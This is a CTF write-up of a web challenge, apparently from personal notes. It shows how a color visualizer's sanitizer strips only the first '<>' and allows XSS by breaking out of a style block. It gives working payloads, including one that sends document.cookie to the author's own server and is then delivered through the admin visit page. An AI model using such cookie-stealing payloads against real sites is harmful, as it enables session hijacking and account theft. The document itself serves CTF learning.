![74ebcb8ed17db8be4ff34481a6a210aa.png](320fd670dd1845439d57d2d6a8ac9abd.png) /admin ![03ba8f48dae28b13e3d6135b7e16db9d.png](a33833c3c1b34de4a2696506094f382f.png) Let's check out the source of the color visualizer. ![b5c6b49a7587b503bdf6ddf89a0efbe0.png](4795d9d2f2a34345a816d4e2435b17a7.png) In the source we can see how it's setting the background color, and that it's sanitizing the input to protect against XSS. Or is it? I noticed in my tests that only the initial <> are being filtered out. Anything after that is fine. So by escaping the style set variable, we can inject our XSS payload. `<></style><img src=x onerror=alert(document.cookie)>` ![5b31e3f231e70dcda24e0ac37c4936cf.png](0d3009eb17ef47d6a38cb2b9a9c55a08.png) So we have XSS, but we want to send the cookie back to us rather than alert it. Here is the script that I hosted on my VPS: ![47190ff94ae10196255595d93e7a0ab0.png](9b450e01a3f94f19aa05ab12a241c451.png) And here is the new payload: `<></style><img src=x onerror=document.location='http://REDACTED/cookie.php?c='+document.cookie>;` So now we can pass this information through the Admin page URL to visit: [http://chall.csivit.com:30256/view](http://chall.csivit.com:30256/view) Color to see: payload ![8ea6baf7cbb4aa83288691d4d269d0b5.png](dab45ef3a39d439fa0f95fa43cebc41c.png) --- Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]] Tags: #ctf #web #xss #css Related: